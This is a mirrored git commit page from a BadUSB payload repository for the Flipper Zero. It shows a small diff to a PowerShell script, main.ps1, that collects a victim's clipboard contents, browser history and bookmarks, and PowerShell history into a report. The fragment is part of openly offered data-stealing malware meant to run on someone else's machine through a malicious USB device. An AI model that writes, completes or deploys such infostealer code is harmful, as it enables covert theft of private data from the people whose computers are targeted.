mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-29 06:03:35 -08:00
Update main.ps1
This commit is contained in:
@@ -289,6 +289,9 @@ $debugDetect = "Debugging Check : $debugD"
|
||||
|
||||
|
||||
$clipboard = Get-Clipboard
|
||||
if (!($clipboard)){
|
||||
$clipboard = "No Data Found.."
|
||||
}
|
||||
# History and Bookmark Data
|
||||
$Expression = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
|
||||
$Paths = @{
|
||||
@@ -489,7 +492,7 @@ $clipboard
|
||||
|
||||
Browser History
|
||||
---------------------------------------
|
||||
$Value
|
||||
$entry
|
||||
|
||||
Powershell History
|
||||
---------------------------------------
|
||||
|
||||
Reference in New Issue
Block a user